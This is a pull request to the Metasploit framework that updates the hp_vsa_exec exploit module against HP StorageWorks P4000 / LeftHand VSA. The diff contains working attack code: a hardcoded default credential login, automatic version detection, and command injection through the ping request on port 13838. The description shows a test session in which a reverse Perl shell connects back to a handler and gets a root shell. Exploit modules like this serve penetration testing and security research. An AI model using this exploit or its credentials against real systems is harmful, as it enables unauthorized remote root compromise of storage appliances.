### PR TITLE
Modify hp_vsa_exec to work with lefthand 9.0.0

### DIFF
--- a/modules/exploits/multi/misc/hp_vsa_exec.rb
+++ b/modules/exploits/multi/misc/hp_vsa_exec.rb
@@ -17,7 +17,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Name'           => "HP StorageWorks P4000 Virtual SAN Appliance Command Execution",
 			'Description'    => %q{
 					This module exploits a vulnerability found in HP's StorageWorks P4000 VSA on
-				versions prior to 9.5.  By using a default account credential, it is possible
+				versions prior to 9.5. By using a default account credential, it is possible
 				to inject arbitrary commands as part of a ping request via port 13838.
 			},
 			'License'        => MSF_LICENSE,
@@ -50,9 +50,11 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Arch'           => ARCH_CMD,
 			'Targets'        =>
 				[
-					['HP VSA prior to 9.5', {}]
+					[ 'Automatic',        {} ],
+					[ 'HP VSA up to 8.5', { 'Version' => '8.5.0' } ],
+					[ 'HP VSA 9',         { 'Version' => '9.0.0' } ]
 				],
-			'Privileged'     => false,
+			'Privileged'     => true,
 			'DisclosureDate' => "Nov 11 2011",
 			'DefaultTarget'  => 0))
 
@@ -75,20 +77,53 @@ class Metasploit3 < Msf::Exploit::Remote
 		pkt
 	end
 
+	def get_target
+		if target.name !~ /Automatic/
+			return target
+		end
+
+		# Login at 8.5.0
+		packet = generate_packet("login:/global$agent/L0CAlu53R/Version \"8.5.0\"")
+		print_status("#{rhost}:#{rport} Sending login packet for version 8.5.0")
+		sock.put(packet)
+		res = sock.get_once
+		vprint_status(Rex::Text.to_hex_dump(res)) if res
+		if res and res=~ /OK/ and res=~ /Login/
+			return targets[1]
+		end
+
+		# Login at 9.0.0
+		packet = generate_packet("login:/global$agent/L0CAlu53R/Version \"9.0.0\"")
+		print_status("#{rhost}:#{rport} Sending login packet for version 9.0.0")
+		sock.put(packet)
+		res = sock.get_once
+		vprint_status(Rex::Text.to_hex_dump(res)) if res
+		if res and res=~ /OK/ and res =~ /Login/
+			return targets[2]
+		end
+
+		fail_with(Msf::Exploit::Failure::NoTarget, "#{rhost}:#{rport} - Target auto detection didn't work'")
+	end
 
 	def exploit
 		connect
 
-		# Login packet
-		print_status("#{rhost}:#{rport} Sending login packet")
-		packet = generate_packet("login:/global$agent/L0CAlu53R/Version \"8.5.0\"")
-		sock.put(packet)
-		res = sock.get_once
-		vprint_status(Rex::Text.to_hex_dump(res)) if res
+		if target.name =~ /Automatic/
+			my_target = get_target
+			print_good("#{rhost}:#{rport} - Target #{my_target.name} found")
+		else
+			my_target = target
+			print_status("#{rhost}:#{rport} Sending login packet")
+			packet = generate_packet("login:/global$agent/L0CAlu53R/Version \"#{my_target['Version']}\"")
+			sock.put(packet)
+			res = sock.get_once
+			vprint_status(Rex::Text.to_hex_dump(res)) if res
+		end
 
 		# Command execution
 		print_status("#{rhost}:#{rport} Sending injection")
 		data = "get:/lhn/public/network/ping/127.0.0.1/foobar;#{payload.encoded}/"
+		data << "64/5/" if my_target.name =~ /9/
 		packet = generate_packet(data)
 		sock.put(packet)
 		res = sock.get_once


### PR DESCRIPTION
While looking at the new ZDI-13-\* vulns related to LeftHand I've noticed it still works with LeftHand 9.0.0, just the packets needs to be adjusted a little.

I added an automatic target to keep the Excellent ranking :)

test:

```
msf > use exploit/multi/misc/hp_vsa_exec 
msf  exploit(hp_vsa_exec) > show options

Module options (exploit/multi/misc/hp_vsa_exec):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  13838            yes       The remote port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf  exploit(hp_vsa_exec) > set rhost 192.168.1.190
rhost => 192.168.1.190
msf  exploit(hp_vsa_exec) > set payload cmd/unix/reverse_perl
payload => cmd/unix/reverse_perl
msf  exploit(hp_vsa_exec) > exploit

[*] Started reverse handler on 192.168.1.128:4444 
[*] 192.168.1.190:13838 Sending login packet for version 8.5.0
[*] 192.168.1.190:13838 Sending login packet for version 9.0.0
[+] 192.168.1.190:13838 - Target HP VSA 9 found
[*] 192.168.1.190:13838 Sending injection
[*] Command shell session 1 opened (192.168.1.128:4444 -> 192.168.1.190:50401) at 2013-02-15 19:00:35 +0100

id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
uname -a
Linux vsatest 2.6.32.15 #1 SMP Wed Aug 25 17:59:43 MDT 2010 i686 i686 i386 GNU/Linux
^C
Abort session 1? [y/N]  y

[*] 192.168.1.190 - Command shell session 1 closed.  Reason: User exit

```
